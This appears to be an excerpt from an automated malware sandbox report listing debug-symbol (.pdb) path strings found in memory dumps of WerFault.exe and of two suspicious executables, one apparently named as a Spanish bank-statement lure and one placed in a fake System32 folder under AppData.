          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: bcrypt.pdb1 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: crypt32.pdb8 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB@Jh source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbtE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbkE source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: CLBCatQ.pdbC source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp
          Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: ole32.pdbX source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdb+ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbY source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdbv source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: propsys.pdba source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb, source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbWS source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdbs source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb7cZ^ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: WLDP.pdbl source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb2 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbq source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: iVisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb, source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb~ source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.668176403.00000000030C2000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721203841.00000000006C0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.734239841.000000000327F000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: .pdbAx source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: .pdb% source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb" source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701306786.00000000014A8000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: version.pdbb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdbk source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb= source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb''J source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: psapi.pdb@ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.668152487.00000000030B6000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.720778134.00000000006B4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBx source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdbp source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wUxTheme.pdb8 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: CLBCatQ.pdbc source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDs source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbkw source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: onfiguration.ni.pdb@ source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbbg-6 source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBg[l_ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
